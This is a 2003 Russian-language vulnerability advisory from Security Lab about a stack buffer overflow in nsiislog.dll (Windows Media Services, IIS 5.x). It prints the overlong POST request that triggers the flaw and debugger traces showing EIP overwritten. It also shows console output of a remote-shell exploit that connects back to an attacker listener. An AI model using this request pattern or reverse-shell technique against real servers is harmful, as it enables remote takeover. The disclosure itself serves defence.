Security Lab

Подробности переполнения буфера в Windows Media Services

Дата публикации:27.06.2003
Дата изменения:14.03.2009
Всего просмотров:1475
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Microsoft Internet Information Services (IIS) 5.x
Microsoft Windows Media Services 4.x
Описание: Вчера Microsoft выпустила патч, устраняющий уязвимость в компоненте nsiislog.dll в Windows Media Services и Microsoft Internet Information Service. Сегодня раскрываются подробности обнаруженной уязвимости. 

Удаленный пользователь может послать чрезмерно длинный запрос к nsiislog.dll, чтобы вызвать переполнение буфера со следующей ошибкой:

Event Type:	Warning
Event Source:	W3SVC
Event Category:	None
Event ID:	37
Description:
Out of process application '/LM/W3SVC/1/Root' terminated unexpectedly.
Уязвимость приводит к стандартному переполнению стека с возможностью записи произвольного значения в EIP регистр, в результате чего возможно удаленное выполнение произвольных команд на сервере с привилегиями IWAM_machinename. Примеры:
POST /scripts/nsiislog.dll HTTP/1.1
content-length: <postlength>

<post data>

Using Size: 4354
Connecting....Sending Buffer....
78028E9F   mov al,byte ptr [esi]     ESI = 00B138B4

Using Size: 5000
Connecting....Sending Buffer....
40F01F3B   repne scas byte ptr [edi] EDI = 58585858

Using Size: 25000
Connecting....Sending Buffer....
78005994   mov dword ptr [edi],edx   EDX = 58585858
-
58585858   ???  illegal op           EIP = 58585858
Пример работы эксплоита:
%:\>exploit 192.168.1.63
** IISNSLOG.DLL - Remote Shell **

. Calling Home: blackhole:2000
. Shellcode Size: 322 bytes
. Preparing Exploit Buffer......Ready
. Starting Listener On Port: 2000
. Connecting To Target
. Sending Exploit......Exploit Sent
. Connection Received
Microsoft Windows 2000 [Version 5.00.2195]
Ссылки: Windows Media Services Remote Command Execution #2